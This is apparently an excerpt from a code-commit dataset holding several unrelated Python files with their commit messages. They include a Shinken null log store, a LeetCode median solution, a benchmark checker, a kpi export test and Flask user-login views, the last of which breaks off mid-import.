This class store log broks in a black hole
It is one possibility (!) for an exchangeable storage for log broks
"""
import os
import sys
import time
import datetime
import re
from shinken.objects.service import Service
from shinken.basemodule import BaseModule
from shinken.objects.module import Module
properties = {
'daemons': ['livestatus'],
'type': 'logstore_null',
'external': False,
'phases': ['running'],
}
# called by the plugin manager
def get_instance(plugin):
print "Get an LogStore Null module for plugin %s" % plugin.get_name()
instance = LiveStatusLogStoreNull(plugin)
return instance
class LiveStatusLogStoreNull(BaseModule):
def __init__(self, modconf):
BaseModule.__init__(self, modconf)
self.plugins = []
# Now sleep one second, so that won't get lineno collisions with the last second
time.sleep(1)
Logline.lineno = 0
def load(self, app):
self.app = app
def init(self):
pass
def open(self):
print "open LiveStatusLogStoreNull ok"
def close(self):
pass
def commit(self):
pass
def commit_and_rotate_log_db(self):
pass
def manage_log_brok(self, b):
# log brok successfully stored in the black hole
pass
def add_filter(self, operator, attribute, reference):
pass
def add_filter_and(self, andnum):
pass
def add_filter_or(self, ornum):
pass
def add_filter_not(self):
pass
def get_live_data_log(self):
"""Like get_live_data, but for log objects"""
result = []
return result
|
|
3c7c9e9ecd5d91b81b28737aa5557437297f6548
|
src/4-MedianOfTwoSortedArrays.py
|
src/4-MedianOfTwoSortedArrays.py
|
class Solution(object):
def findMedianSortedArrays(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: float
"""
m, n = len(nums1), len(nums2)
if m > n:
nums1, nums2, m, n = nums2, nums1, n, m
if n == 0:
return None
iMin, iMax, half = 0, m, (m + n + 1) / 2
while iMin <= iMax:
i = (iMin + iMax) / 2
j = half - i
if j > 0 and i < m and nums2[j-1] > nums1[i]:
iMin = i + 1
elif i > 0 and j < n and nums1[i-1] > nums2[j]:
iMax = i - 1
else:
if i == 0:
maxOfLeft = nums2[j-1]
elif j == 0:
maxOfLeft = nums1[i-1]
else:
maxOfLeft = max(nums1[i-1], nums2[j-1])
if (m + n) % 2 == 1:
return maxOfLeft
if i == m:
minOfRight = nums2[j]
elif j == n:
minOfRight = nums1[i]
else:
minOfRight = min(nums1[i], nums2[j])
return (maxOfLeft + minOfRight) / 2.0
|
Revert "Revert "Your runtime beats 53.69% of pythonsubmissions.""
|
Revert "Revert "Your runtime beats 53.69% of pythonsubmissions.""
This reverts commit 8f36076e50ed375246c1fd23ed9f0e6ed7152e88.
|
Python
|
apache-2.0
|
zhuxiang/LeetCode-Python
|
Revert "Revert "Your runtime beats 53.69% of pythonsubmissions.""
This reverts commit 8f36076e50ed375246c1fd23ed9f0e6ed7152e88.
|
class Solution(object):
def findMedianSortedArrays(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: float
"""
m, n = len(nums1), len(nums2)
if m > n:
nums1, nums2, m, n = nums2, nums1, n, m
if n == 0:
return None
iMin, iMax, half = 0, m, (m + n + 1) / 2
while iMin <= iMax:
i = (iMin + iMax) / 2
j = half - i
if j > 0 and i < m and nums2[j-1] > nums1[i]:
iMin = i + 1
elif i > 0 and j < n and nums1[i-1] > nums2[j]:
iMax = i - 1
else:
if i == 0:
maxOfLeft = nums2[j-1]
elif j == 0:
maxOfLeft = nums1[i-1]
else:
maxOfLeft = max(nums1[i-1], nums2[j-1])
if (m + n) % 2 == 1:
return maxOfLeft
if i == m:
minOfRight = nums2[j]
elif j == n:
minOfRight = nums1[i]
else:
minOfRight = min(nums1[i], nums2[j])
return (maxOfLeft + minOfRight) / 2.0
|
<commit_before><commit_msg>Revert "Revert "Your runtime beats 53.69% of pythonsubmissions.""
This reverts commit 8f36076e50ed375246c1fd23ed9f0e6ed7152e88.<commit_after>
|
class Solution(object):
def findMedianSortedArrays(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: float
"""
m, n = len(nums1), len(nums2)
if m > n:
nums1, nums2, m, n = nums2, nums1, n, m
if n == 0:
return None
iMin, iMax, half = 0, m, (m + n + 1) / 2
while iMin <= iMax:
i = (iMin + iMax) / 2
j = half - i
if j > 0 and i < m and nums2[j-1] > nums1[i]:
iMin = i + 1
elif i > 0 and j < n and nums1[i-1] > nums2[j]:
iMax = i - 1
else:
if i == 0:
maxOfLeft = nums2[j-1]
elif j == 0:
maxOfLeft = nums1[i-1]
else:
maxOfLeft = max(nums1[i-1], nums2[j-1])
if (m + n) % 2 == 1:
return maxOfLeft
if i == m:
minOfRight = nums2[j]
elif j == n:
minOfRight = nums1[i]
else:
minOfRight = min(nums1[i], nums2[j])
return (maxOfLeft + minOfRight) / 2.0
|
Revert "Revert "Your runtime beats 53.69% of pythonsubmissions.""
This reverts commit 8f36076e50ed375246c1fd23ed9f0e6ed7152e88.class Solution(object):
def findMedianSortedArrays(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: float
"""
m, n = len(nums1), len(nums2)
if m > n:
nums1, nums2, m, n = nums2, nums1, n, m
if n == 0:
return None
iMin, iMax, half = 0, m, (m + n + 1) / 2
while iMin <= iMax:
i = (iMin + iMax) / 2
j = half - i
if j > 0 and i < m and nums2[j-1] > nums1[i]:
iMin = i + 1
elif i > 0 and j < n and nums1[i-1] > nums2[j]:
iMax = i - 1
else:
if i == 0:
maxOfLeft = nums2[j-1]
elif j == 0:
maxOfLeft = nums1[i-1]
else:
maxOfLeft = max(nums1[i-1], nums2[j-1])
if (m + n) % 2 == 1:
return maxOfLeft
if i == m:
minOfRight = nums2[j]
elif j == n:
minOfRight = nums1[i]
else:
minOfRight = min(nums1[i], nums2[j])
return (maxOfLeft + minOfRight) / 2.0
|
<commit_before><commit_msg>Revert "Revert "Your runtime beats 53.69% of pythonsubmissions.""
This reverts commit 8f36076e50ed375246c1fd23ed9f0e6ed7152e88.<commit_after>class Solution(object):
def findMedianSortedArrays(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: float
"""
m, n = len(nums1), len(nums2)
if m > n:
nums1, nums2, m, n = nums2, nums1, n, m
if n == 0:
return None
iMin, iMax, half = 0, m, (m + n + 1) / 2
while iMin <= iMax:
i = (iMin + iMax) / 2
j = half - i
if j > 0 and i < m and nums2[j-1] > nums1[i]:
iMin = i + 1
elif i > 0 and j < n and nums1[i-1] > nums2[j]:
iMax = i - 1
else:
if i == 0:
maxOfLeft = nums2[j-1]
elif j == 0:
maxOfLeft = nums1[i-1]
else:
maxOfLeft = max(nums1[i-1], nums2[j-1])
if (m + n) % 2 == 1:
return maxOfLeft
if i == m:
minOfRight = nums2[j]
elif j == n:
minOfRight = nums1[i]
else:
minOfRight = min(nums1[i], nums2[j])
return (maxOfLeft + minOfRight) / 2.0
|
|
8fd2f0fe7835da72fd230f48ff34cf0c4723babf
|
personalized_content_filter/main.py
|
personalized_content_filter/main.py
|
import csv
import indicoio
from indicoio.custom import Collection
# insert your API key
indicoio.config.api_key = "YOUR_API_KEY"
def clean_article(article):
return article.replace("\n", " ").decode('cp1252').encode('utf-8', 'replace')
def test_model(test_list):
cleaned_test = [clean_article(text) for row in test_list for text in row]
print "Articles cleaned and ready for analysis!"
for data in cleaned_test:
print collection.predict(data)
if __name__ == "__main__":
# Replace "YOUR_COLLECTION_NAME" with the name you gave your dataset in CrowdLabel
collection = Collection("YOUR_COLLECTION_NAME")
with open('test_articles.csv', 'rU') as f:
test_list = csv.reader(f)
test_model(test_list)
|
Create script for Personalized Content Filter post
|
Create script for Personalized Content Filter post
|
Python
|
mit
|
IndicoDataSolutions/SuperCell
|
Create script for Personalized Content Filter post
|
import csv
import indicoio
from indicoio.custom import Collection
# insert your API key
indicoio.config.api_key = "YOUR_API_KEY"
def clean_article(article):
return article.replace("\n", " ").decode('cp1252').encode('utf-8', 'replace')
def test_model(test_list):
cleaned_test = [clean_article(text) for row in test_list for text in row]
print "Articles cleaned and ready for analysis!"
for data in cleaned_test:
print collection.predict(data)
if __name__ == "__main__":
# Replace "YOUR_COLLECTION_NAME" with the name you gave your dataset in CrowdLabel
collection = Collection("YOUR_COLLECTION_NAME")
with open('test_articles.csv', 'rU') as f:
test_list = csv.reader(f)
test_model(test_list)
|
<commit_before><commit_msg>Create script for Personalized Content Filter post<commit_after>
|
import csv
import indicoio
from indicoio.custom import Collection
# insert your API key
indicoio.config.api_key = "YOUR_API_KEY"
def clean_article(article):
return article.replace("\n", " ").decode('cp1252').encode('utf-8', 'replace')
def test_model(test_list):
cleaned_test = [clean_article(text) for row in test_list for text in row]
print "Articles cleaned and ready for analysis!"
for data in cleaned_test:
print collection.predict(data)
if __name__ == "__main__":
# Replace "YOUR_COLLECTION_NAME" with the name you gave your dataset in CrowdLabel
collection = Collection("YOUR_COLLECTION_NAME")
with open('test_articles.csv', 'rU') as f:
test_list = csv.reader(f)
test_model(test_list)
|
Create script for Personalized Content Filter postimport csv
import indicoio
from indicoio.custom import Collection
# insert your API key
indicoio.config.api_key = "YOUR_API_KEY"
def clean_article(article):
return article.replace("\n", " ").decode('cp1252').encode('utf-8', 'replace')
def test_model(test_list):
cleaned_test = [clean_article(text) for row in test_list for text in row]
print "Articles cleaned and ready for analysis!"
for data in cleaned_test:
print collection.predict(data)
if __name__ == "__main__":
# Replace "YOUR_COLLECTION_NAME" with the name you gave your dataset in CrowdLabel
collection = Collection("YOUR_COLLECTION_NAME")
with open('test_articles.csv', 'rU') as f:
test_list = csv.reader(f)
test_model(test_list)
|
<commit_before><commit_msg>Create script for Personalized Content Filter post<commit_after>import csv
import indicoio
from indicoio.custom import Collection
# insert your API key
indicoio.config.api_key = "YOUR_API_KEY"
def clean_article(article):
return article.replace("\n", " ").decode('cp1252').encode('utf-8', 'replace')
def test_model(test_list):
cleaned_test = [clean_article(text) for row in test_list for text in row]
print "Articles cleaned and ready for analysis!"
for data in cleaned_test:
print collection.predict(data)
if __name__ == "__main__":
# Replace "YOUR_COLLECTION_NAME" with the name you gave your dataset in CrowdLabel
collection = Collection("YOUR_COLLECTION_NAME")
with open('test_articles.csv', 'rU') as f:
test_list = csv.reader(f)
test_model(test_list)
|
|
a501b99fa60ca5118d2a0e0be4e8c2dff5bd385d
|
ci/check-benchmark.py
|
ci/check-benchmark.py
|
#!/usr/bin/env python3
import json
import sys
def run_compare(report):
with open(report) as f:
doc = json.load(f)
for testcase in doc:
measurements = testcase['measurements']
time = float(measurements[0]["time"])
if time < 0:
continue
if time > 0.05:
print("More than 5% performance decrease, considering it a failure")
sys.exit(2)
def main(argv):
if len(argv) != 2:
print(f'Usage: {argv[0]} <path-to-compare.json>')
sys.exit(1)
run_compare(argv[1])
if __name__ == '__main__':
main(sys.argv)
|
Add a script to process benchmark comparisons
|
CI: Add a script to process benchmark comparisons
|
Python
|
lgpl-2.1
|
chouquette/medialibrary,chouquette/medialibrary,chouquette/medialibrary,chouquette/medialibrary
|
CI: Add a script to process benchmark comparisons
|
#!/usr/bin/env python3
import json
import sys
def run_compare(report):
with open(report) as f:
doc = json.load(f)
for testcase in doc:
measurements = testcase['measurements']
time = float(measurements[0]["time"])
if time < 0:
continue
if time > 0.05:
print("More than 5% performance decrease, considering it a failure")
sys.exit(2)
def main(argv):
if len(argv) != 2:
print(f'Usage: {argv[0]} <path-to-compare.json>')
sys.exit(1)
run_compare(argv[1])
if __name__ == '__main__':
main(sys.argv)
|
<commit_before><commit_msg>CI: Add a script to process benchmark comparisons<commit_after>
|
#!/usr/bin/env python3
import json
import sys
def run_compare(report):
with open(report) as f:
doc = json.load(f)
for testcase in doc:
measurements = testcase['measurements']
time = float(measurements[0]["time"])
if time < 0:
continue
if time > 0.05:
print("More than 5% performance decrease, considering it a failure")
sys.exit(2)
def main(argv):
if len(argv) != 2:
print(f'Usage: {argv[0]} <path-to-compare.json>')
sys.exit(1)
run_compare(argv[1])
if __name__ == '__main__':
main(sys.argv)
|
CI: Add a script to process benchmark comparisons#!/usr/bin/env python3
import json
import sys
def run_compare(report):
with open(report) as f:
doc = json.load(f)
for testcase in doc:
measurements = testcase['measurements']
time = float(measurements[0]["time"])
if time < 0:
continue
if time > 0.05:
print("More than 5% performance decrease, considering it a failure")
sys.exit(2)
def main(argv):
if len(argv) != 2:
print(f'Usage: {argv[0]} <path-to-compare.json>')
sys.exit(1)
run_compare(argv[1])
if __name__ == '__main__':
main(sys.argv)
|
<commit_before><commit_msg>CI: Add a script to process benchmark comparisons<commit_after>#!/usr/bin/env python3
import json
import sys
def run_compare(report):
with open(report) as f:
doc = json.load(f)
for testcase in doc:
measurements = testcase['measurements']
time = float(measurements[0]["time"])
if time < 0:
continue
if time > 0.05:
print("More than 5% performance decrease, considering it a failure")
sys.exit(2)
def main(argv):
if len(argv) != 2:
print(f'Usage: {argv[0]} <path-to-compare.json>')
sys.exit(1)
run_compare(argv[1])
if __name__ == '__main__':
main(sys.argv)
|
|
9edb1098aa7a4993d801550d03399fd85450b0c0
|
regscrape/regs_common/commands/mark_searchable_entities.py
|
regscrape/regs_common/commands/mark_searchable_entities.py
|
GEVENT = False
def run():
from regs_models import Entity
print "Updating entity search index..."
# mark the ones that should be searchable but aren't as searchable
Entity.objects(__raw__={
'td_type': 'organization',
'stats.count': {'$gt': 0},
'searchable': False
}).update(set__searchable=True, safe_update=True, multi=True)
# mark the ones that are searchable but shouldn't be unsearchable
Entity.objects(__raw__={
'$or': [
{'td_type': {'$ne': 'organization'}},
{'stats.count': {'$not': {'$gt': 0}}}
],
'searchable': True
}).update(set__searchable=False, safe_update=True, multi=True)
print "Update complete."
|
Add a tiny bit of infrastructure to make Mongo-based search work for entities.
|
Add a tiny bit of infrastructure to make Mongo-based search work for entities.
|
Python
|
bsd-3-clause
|
sunlightlabs/regulations-scraper,sunlightlabs/regulations-scraper,sunlightlabs/regulations-scraper
|
Add a tiny bit of infrastructure to make Mongo-based search work for entities.
|
GEVENT = False
def run():
from regs_models import Entity
print "Updating entity search index..."
# mark the ones that should be searchable but aren't as searchable
Entity.objects(__raw__={
'td_type': 'organization',
'stats.count': {'$gt': 0},
'searchable': False
}).update(set__searchable=True, safe_update=True, multi=True)
# mark the ones that are searchable but shouldn't be unsearchable
Entity.objects(__raw__={
'$or': [
{'td_type': {'$ne': 'organization'}},
{'stats.count': {'$not': {'$gt': 0}}}
],
'searchable': True
}).update(set__searchable=False, safe_update=True, multi=True)
print "Update complete."
|
<commit_before><commit_msg>Add a tiny bit of infrastructure to make Mongo-based search work for entities.<commit_after>
|
GEVENT = False
def run():
from regs_models import Entity
print "Updating entity search index..."
# mark the ones that should be searchable but aren't as searchable
Entity.objects(__raw__={
'td_type': 'organization',
'stats.count': {'$gt': 0},
'searchable': False
}).update(set__searchable=True, safe_update=True, multi=True)
# mark the ones that are searchable but shouldn't be unsearchable
Entity.objects(__raw__={
'$or': [
{'td_type': {'$ne': 'organization'}},
{'stats.count': {'$not': {'$gt': 0}}}
],
'searchable': True
}).update(set__searchable=False, safe_update=True, multi=True)
print "Update complete."
|
Add a tiny bit of infrastructure to make Mongo-based search work for entities.GEVENT = False
def run():
from regs_models import Entity
print "Updating entity search index..."
# mark the ones that should be searchable but aren't as searchable
Entity.objects(__raw__={
'td_type': 'organization',
'stats.count': {'$gt': 0},
'searchable': False
}).update(set__searchable=True, safe_update=True, multi=True)
# mark the ones that are searchable but shouldn't be unsearchable
Entity.objects(__raw__={
'$or': [
{'td_type': {'$ne': 'organization'}},
{'stats.count': {'$not': {'$gt': 0}}}
],
'searchable': True
}).update(set__searchable=False, safe_update=True, multi=True)
print "Update complete."
|
<commit_before><commit_msg>Add a tiny bit of infrastructure to make Mongo-based search work for entities.<commit_after>GEVENT = False
def run():
from regs_models import Entity
print "Updating entity search index..."
# mark the ones that should be searchable but aren't as searchable
Entity.objects(__raw__={
'td_type': 'organization',
'stats.count': {'$gt': 0},
'searchable': False
}).update(set__searchable=True, safe_update=True, multi=True)
# mark the ones that are searchable but shouldn't be unsearchable
Entity.objects(__raw__={
'$or': [
{'td_type': {'$ne': 'organization'}},
{'stats.count': {'$not': {'$gt': 0}}}
],
'searchable': True
}).update(set__searchable=False, safe_update=True, multi=True)
print "Update complete."
|
|
bdb30f79722b5111a240f2724cdd12ac353493a7
|
kpi/tests/api/v1/test_api_exports.py
|
kpi/tests/api/v1/test_api_exports.py
|
# coding: utf-8
from collections import defaultdict
from rest_framework import status
from rest_framework.reverse import reverse
from kpi.models import Asset, ExportTask
from kpi.tests.base_test_case import BaseTestCase
from kpi.tests.test_mock_data_exports import MockDataExports
class AssetExportTaskTest(MockDataExports, BaseTestCase):
def test_export_uid_filter(self):
assert self.user.username == 'someuser'
def _create_export_task(asset):
export_task = ExportTask()
export_task.user = self.user
export_task.data = {
'source': reverse('asset-detail', args=[asset.uid]),
'type': 'csv'
}
messages = defaultdict(list)
export_task._run_task(messages)
return export_task
matching_export = _create_export_task(self.asset)
# Create a clone and generate an export from it
excluded_asset = Asset()
excluded_asset.owner = self.asset.owner
excluded_asset.content = self.asset.content
excluded_asset.save()
excluded_asset.deploy(backend='mock', active=True)
excluded_asset.save()
excluded_export = _create_export_task(excluded_asset)
# Retrieve all the exports unfiltered
self.client.login(username='someuser', password='someuser')
list_url = reverse(self._get_endpoint('exporttask-list'))
response = self.client.get(list_url)
assert response.status_code == status.HTTP_200_OK
assert response.json()['count'] == 2
# Retrieve the exports filtered by a single asset uid
filter_url = f'{list_url}?q=source:{self.asset.uid}'
response = self.client.get(filter_url)
assert response.status_code == status.HTTP_200_OK
response_dict = response.json()
assert response_dict['count'] == 1
assert self.asset.uid in response_dict['results'][0]['data']['source']
|
Add (failing) test for uid export filter
|
Add (failing) test for uid export filter
|
Python
|
agpl-3.0
|
kobotoolbox/kpi,kobotoolbox/kpi,kobotoolbox/kpi,kobotoolbox/kpi,kobotoolbox/kpi
|
Add (failing) test for uid export filter
|
# coding: utf-8
from collections import defaultdict
from rest_framework import status
from rest_framework.reverse import reverse
from kpi.models import Asset, ExportTask
from kpi.tests.base_test_case import BaseTestCase
from kpi.tests.test_mock_data_exports import MockDataExports
class AssetExportTaskTest(MockDataExports, BaseTestCase):
def test_export_uid_filter(self):
assert self.user.username == 'someuser'
def _create_export_task(asset):
export_task = ExportTask()
export_task.user = self.user
export_task.data = {
'source': reverse('asset-detail', args=[asset.uid]),
'type': 'csv'
}
messages = defaultdict(list)
export_task._run_task(messages)
return export_task
matching_export = _create_export_task(self.asset)
# Create a clone and generate an export from it
excluded_asset = Asset()
excluded_asset.owner = self.asset.owner
excluded_asset.content = self.asset.content
excluded_asset.save()
excluded_asset.deploy(backend='mock', active=True)
excluded_asset.save()
excluded_export = _create_export_task(excluded_asset)
# Retrieve all the exports unfiltered
self.client.login(username='someuser', password='someuser')
list_url = reverse(self._get_endpoint('exporttask-list'))
response = self.client.get(list_url)
assert response.status_code == status.HTTP_200_OK
assert response.json()['count'] == 2
# Retrieve the exports filtered by a single asset uid
filter_url = f'{list_url}?q=source:{self.asset.uid}'
response = self.client.get(filter_url)
assert response.status_code == status.HTTP_200_OK
response_dict = response.json()
assert response_dict['count'] == 1
assert self.asset.uid in response_dict['results'][0]['data']['source']
|
<commit_before><commit_msg>Add (failing) test for uid export filter<commit_after>
|
# coding: utf-8
from collections import defaultdict
from rest_framework import status
from rest_framework.reverse import reverse
from kpi.models import Asset, ExportTask
from kpi.tests.base_test_case import BaseTestCase
from kpi.tests.test_mock_data_exports import MockDataExports
class AssetExportTaskTest(MockDataExports, BaseTestCase):
def test_export_uid_filter(self):
assert self.user.username == 'someuser'
def _create_export_task(asset):
export_task = ExportTask()
export_task.user = self.user
export_task.data = {
'source': reverse('asset-detail', args=[asset.uid]),
'type': 'csv'
}
messages = defaultdict(list)
export_task._run_task(messages)
return export_task
matching_export = _create_export_task(self.asset)
# Create a clone and generate an export from it
excluded_asset = Asset()
excluded_asset.owner = self.asset.owner
excluded_asset.content = self.asset.content
excluded_asset.save()
excluded_asset.deploy(backend='mock', active=True)
excluded_asset.save()
excluded_export = _create_export_task(excluded_asset)
# Retrieve all the exports unfiltered
self.client.login(username='someuser', password='someuser')
list_url = reverse(self._get_endpoint('exporttask-list'))
response = self.client.get(list_url)
assert response.status_code == status.HTTP_200_OK
assert response.json()['count'] == 2
# Retrieve the exports filtered by a single asset uid
filter_url = f'{list_url}?q=source:{self.asset.uid}'
response = self.client.get(filter_url)
assert response.status_code == status.HTTP_200_OK
response_dict = response.json()
assert response_dict['count'] == 1
assert self.asset.uid in response_dict['results'][0]['data']['source']
|
Add (failing) test for uid export filter# coding: utf-8
from collections import defaultdict
from rest_framework import status
from rest_framework.reverse import reverse
from kpi.models import Asset, ExportTask
from kpi.tests.base_test_case import BaseTestCase
from kpi.tests.test_mock_data_exports import MockDataExports
class AssetExportTaskTest(MockDataExports, BaseTestCase):
def test_export_uid_filter(self):
assert self.user.username == 'someuser'
def _create_export_task(asset):
export_task = ExportTask()
export_task.user = self.user
export_task.data = {
'source': reverse('asset-detail', args=[asset.uid]),
'type': 'csv'
}
messages = defaultdict(list)
export_task._run_task(messages)
return export_task
matching_export = _create_export_task(self.asset)
# Create a clone and generate an export from it
excluded_asset = Asset()
excluded_asset.owner = self.asset.owner
excluded_asset.content = self.asset.content
excluded_asset.save()
excluded_asset.deploy(backend='mock', active=True)
excluded_asset.save()
excluded_export = _create_export_task(excluded_asset)
# Retrieve all the exports unfiltered
self.client.login(username='someuser', password='someuser')
list_url = reverse(self._get_endpoint('exporttask-list'))
response = self.client.get(list_url)
assert response.status_code == status.HTTP_200_OK
assert response.json()['count'] == 2
# Retrieve the exports filtered by a single asset uid
filter_url = f'{list_url}?q=source:{self.asset.uid}'
response = self.client.get(filter_url)
assert response.status_code == status.HTTP_200_OK
response_dict = response.json()
assert response_dict['count'] == 1
assert self.asset.uid in response_dict['results'][0]['data']['source']
|
<commit_before><commit_msg>Add (failing) test for uid export filter<commit_after># coding: utf-8
from collections import defaultdict
from rest_framework import status
from rest_framework.reverse import reverse
from kpi.models import Asset, ExportTask
from kpi.tests.base_test_case import BaseTestCase
from kpi.tests.test_mock_data_exports import MockDataExports
class AssetExportTaskTest(MockDataExports, BaseTestCase):
def test_export_uid_filter(self):
assert self.user.username == 'someuser'
def _create_export_task(asset):
export_task = ExportTask()
export_task.user = self.user
export_task.data = {
'source': reverse('asset-detail', args=[asset.uid]),
'type': 'csv'
}
messages = defaultdict(list)
export_task._run_task(messages)
return export_task
matching_export = _create_export_task(self.asset)
# Create a clone and generate an export from it
excluded_asset = Asset()
excluded_asset.owner = self.asset.owner
excluded_asset.content = self.asset.content
excluded_asset.save()
excluded_asset.deploy(backend='mock', active=True)
excluded_asset.save()
excluded_export = _create_export_task(excluded_asset)
# Retrieve all the exports unfiltered
self.client.login(username='someuser', password='someuser')
list_url = reverse(self._get_endpoint('exporttask-list'))
response = self.client.get(list_url)
assert response.status_code == status.HTTP_200_OK
assert response.json()['count'] == 2
# Retrieve the exports filtered by a single asset uid
filter_url = f'{list_url}?q=source:{self.asset.uid}'
response = self.client.get(filter_url)
assert response.status_code == status.HTTP_200_OK
response_dict = response.json()
assert response_dict['count'] == 1
assert self.asset.uid in response_dict['results'][0]['data']['source']
|
|
c67c2fa38512cad8aa8c20c7c57f2639d6882a8a
|
server/src/test/util/experiments.py
|
server/src/test/util/experiments.py
|
import json
import weblab.core.coordinator.coordinator as Coordinator
import weblab.experiment.level as level
from weblab.experiment.experiment import Experiment
class StorageExperiment(Experiment):
def __init__(self, coord_address, locator, config, *args, **kwargs):
super(StorageExperiment, self).__init__(*args, **kwargs)
self.commands = []
def do_start_experiment(self, client_initial_data, server_initial_data):
return "{}"
def do_get_api(self):
return level.level_2
def do_send_command_to_device(self, command):
self.commands.append(command)
print command
return command
def clear(self):
self.commands = []
def do_dispose(self):
return json.dumps({ Coordinator.FINISH_FINISHED_MESSAGE : True, Coordinator.FINISH_DATA_MESSAGE : ""})
|
Add dummy experiment for testing
|
Add dummy experiment for testing
|
Python
|
bsd-2-clause
|
zstars/weblabdeusto,zstars/weblabdeusto,porduna/weblabdeusto,porduna/weblabdeusto,porduna/weblabdeusto,zstars/weblabdeusto,zstars/weblabdeusto,morelab/weblabdeusto,weblabdeusto/weblabdeusto,morelab/weblabdeusto,morelab/weblabdeusto,zstars/weblabdeusto,zstars/weblabdeusto,morelab/weblabdeusto,porduna/weblabdeusto,zstars/weblabdeusto,porduna/weblabdeusto,porduna/weblabdeusto,porduna/weblabdeusto,morelab/weblabdeusto,zstars/weblabdeusto,porduna/weblabdeusto,morelab/weblabdeusto,morelab/weblabdeusto,porduna/weblabdeusto,morelab/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto,zstars/weblabdeusto,morelab/weblabdeusto,porduna/weblabdeusto,weblabdeusto/weblabdeusto,zstars/weblabdeusto,morelab/weblabdeusto
|
Add dummy experiment for testing
|
import json
import weblab.core.coordinator.coordinator as Coordinator
import weblab.experiment.level as level
from weblab.experiment.experiment import Experiment
class StorageExperiment(Experiment):
def __init__(self, coord_address, locator, config, *args, **kwargs):
super(StorageExperiment, self).__init__(*args, **kwargs)
self.commands = []
def do_start_experiment(self, client_initial_data, server_initial_data):
return "{}"
def do_get_api(self):
return level.level_2
def do_send_command_to_device(self, command):
self.commands.append(command)
print command
return command
def clear(self):
self.commands = []
def do_dispose(self):
return json.dumps({ Coordinator.FINISH_FINISHED_MESSAGE : True, Coordinator.FINISH_DATA_MESSAGE : ""})
|
<commit_before><commit_msg>Add dummy experiment for testing<commit_after>
|
import json
import weblab.core.coordinator.coordinator as Coordinator
import weblab.experiment.level as level
from weblab.experiment.experiment import Experiment
class StorageExperiment(Experiment):
def __init__(self, coord_address, locator, config, *args, **kwargs):
super(StorageExperiment, self).__init__(*args, **kwargs)
self.commands = []
def do_start_experiment(self, client_initial_data, server_initial_data):
return "{}"
def do_get_api(self):
return level.level_2
def do_send_command_to_device(self, command):
self.commands.append(command)
print command
return command
def clear(self):
self.commands = []
def do_dispose(self):
return json.dumps({ Coordinator.FINISH_FINISHED_MESSAGE : True, Coordinator.FINISH_DATA_MESSAGE : ""})
|
Add dummy experiment for testingimport json
import weblab.core.coordinator.coordinator as Coordinator
import weblab.experiment.level as level
from weblab.experiment.experiment import Experiment
class StorageExperiment(Experiment):
def __init__(self, coord_address, locator, config, *args, **kwargs):
super(StorageExperiment, self).__init__(*args, **kwargs)
self.commands = []
def do_start_experiment(self, client_initial_data, server_initial_data):
return "{}"
def do_get_api(self):
return level.level_2
def do_send_command_to_device(self, command):
self.commands.append(command)
print command
return command
def clear(self):
self.commands = []
def do_dispose(self):
return json.dumps({ Coordinator.FINISH_FINISHED_MESSAGE : True, Coordinator.FINISH_DATA_MESSAGE : ""})
|
<commit_before><commit_msg>Add dummy experiment for testing<commit_after>import json
import weblab.core.coordinator.coordinator as Coordinator
import weblab.experiment.level as level
from weblab.experiment.experiment import Experiment
class StorageExperiment(Experiment):
def __init__(self, coord_address, locator, config, *args, **kwargs):
super(StorageExperiment, self).__init__(*args, **kwargs)
self.commands = []
def do_start_experiment(self, client_initial_data, server_initial_data):
return "{}"
def do_get_api(self):
return level.level_2
def do_send_command_to_device(self, command):
self.commands.append(command)
print command
return command
def clear(self):
self.commands = []
def do_dispose(self):
return json.dumps({ Coordinator.FINISH_FINISHED_MESSAGE : True, Coordinator.FINISH_DATA_MESSAGE : ""})
|
|
5371af1ff5aae6f9db51698f1a09dbf50dec4027
|
maediprojects/views/users.py
|
maediprojects/views/users.py
|
from flask import Flask, render_template, flash, request, Markup, \
session, redirect, url_for, escape, Response, abort, send_file, \
current_app
from flask.ext.login import (LoginManager, current_user, login_required,
login_user, logout_user, UserMixin,
confirm_login,
fresh_login_required)
from maediprojects import app, db, models
from maediprojects.query import user as quser
from maediprojects.lib import codelists
login_manager = LoginManager()
login_manager.setup_app(app)
login_manager.login_view = "login"
@login_manager.user_loader
def load_user(id):
return quser.user(id)
@app.route("/users/")
@login_required
def users():
users = quser.user()
return render_template("users.html",
users = users,
loggedinuser=current_user)
@app.route("/users/new/", methods=["GET", "POST"])
@login_required
def users_new():
if request.method=="GET":
user = {}
return render_template("user.html",
user = user,
loggedinuser=current_user,
codelists = codelists.get_codelists())
elif request.method == "POST":
if quser.addUser(request.form):
flash("Successfully created user!", "success")
else:
flash("Sorry, couldn't create that user!", "danger")
return redirect(url_for("users"))
@app.route("/users/<user_id>/", methods=["GET", "POST"])
@login_required
def users_edit(user_id):
if request.method=="GET":
user = quser.user(user_id)
return render_template("user.html",
user = user,
loggedinuser=current_user,
codelists = codelists.get_codelists())
elif request.method == "POST":
if quser.updateUser(request.form):
flash("Successfully updated user!", "success")
else:
flash("Sorry, couldn't update that user!", "danger")
return redirect(url_for("users"))
@app.route("/login/", methods=["GET", "POST"])
def login():
if request.method == "POST" and "username" in request.form:
user = quser.user_by_username(request.form["username"])
if (user and user.check_password(request.form["password"])):
if login_user(user):
flash("Logged in!", "success")
if request.args.get("next"):
redir_url = request.script_root + request.args.get("next")
else:
redir_url = url_for("dashboard")
return redirect(redir_url)
else:
flash("Sorry, but you could not log in.", "danger")
else:
flash(u"Invalid username or password.", "danger")
return render_template("login.html",
loggedinuser=current_user)
@app.route('/logout/')
@login_required
def logout():
logout_user()
flash('Logged out', 'success')
redir_url = url_for("dashboard")
return redirect(redir_url)
|
Add views on to user management functions
|
Add views on to user management functions
|
Python
|
agpl-3.0
|
markbrough/maedi-projects,markbrough/maedi-projects,markbrough/maedi-projects
|
Add views on to user management functions
|
from flask import Flask, render_template, flash, request, Markup, \
session, redirect, url_for, escape, Response, abort, send_file, \
current_app
from flask.ext.login import (LoginManager, current_user, login_required,
login_user, logout_user, UserMixin,
